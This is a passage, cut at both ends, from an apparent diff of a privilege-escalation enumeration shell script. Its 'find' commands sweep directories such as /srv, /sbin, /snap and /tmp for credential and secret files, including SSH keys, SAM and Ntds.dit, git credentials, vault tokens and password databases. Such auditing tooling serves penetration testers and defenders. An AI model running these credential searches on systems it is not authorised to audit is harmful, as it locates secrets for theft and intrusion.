-o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name 
\"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` - FIND_SRV=`eval_bckgrd "find /srv -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o 
-name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" 
-o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SBIN=`eval_bckgrd "find /sbin -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name 
\"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name 
\"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name 
\"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name 
\"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SRV=`eval_bckgrd "find /srv -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name 
\"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o 
-name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYS=`eval_bckgrd "find /sys -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_TMP=`eval_bckgrd "find /tmp -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" 
-o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"agent*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name 
